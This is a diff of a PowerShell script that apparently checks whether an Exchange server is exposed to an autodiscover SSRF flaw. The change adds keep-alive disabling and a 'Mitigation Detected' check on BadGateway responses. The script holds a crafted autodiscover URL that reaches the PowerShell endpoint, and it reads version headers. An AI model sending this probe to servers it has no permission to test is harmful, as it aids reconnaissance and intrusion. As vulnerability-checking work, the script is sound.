| skipped 6 lines |
7 | 7 | | Write-host "Running autodiscover test..." -ForegroundColor Cyan |
8 | 8 | | try |
9 | 9 | | { |
10 | | - | $webtest1 = Invoke-WebRequest -uri "https://$target/autodiscover" -Verbose |
| 10 | + | $webtest1 = Invoke-WebRequest -uri "https://$target/autodiscover" -Verbose -DisableKeepAlive |
11 | 11 | | } |
12 | 12 | | catch |
13 | 13 | | { |
| skipped 1 lines |
15 | 15 | | $Failure = $_.Exception.Response |
16 | 16 | | $Failure.Headers.tostring() |
17 | 17 | | } |
18 | | - | |
19 | | - | |
20 | 18 | | |
21 | 19 | | Write-host "Running autodiscover SSRF test..." -ForegroundColor Cyan |
22 | 20 | | try |
23 | 21 | | { |
24 | 22 | | write-host "testing site..." -ForegroundColor Gray |
25 | | - | $webtest2 = invoke-webrequest -uri "https://$target/autodiscover/[email protected]/owa/&Email=autodiscover/[email protected]&Protocol=HACKER&Protocol=PowerShell" -Verbose |
| 23 | + | $webtest2 = invoke-webrequest -uri "https://$target/autodiscover/[email protected]/owa/&Email=autodiscover/[email protected]&Protocol=HACKER&Protocol=PowerShell" -Verbose -DisableKeepAlive |
26 | 24 | | } |
27 | 25 | | catch |
28 | 26 | | { |
29 | 27 | | write-host "Caught" -ForegroundColor Red |
| 28 | + | $failure.StatusCode |
| 29 | + | if($failure.StatusCode -contains "BadGateway"){write-host "Mitigation Detected" -ForegroundColor Green} |
30 | 30 | | $Failure = $_.Exception.Response |
31 | 31 | | $Failure.Headers.tostring() |
32 | 32 | | $Failure.Headers.tostring() | findstr /I "X-OWA-Version" |
| skipped 26 lines |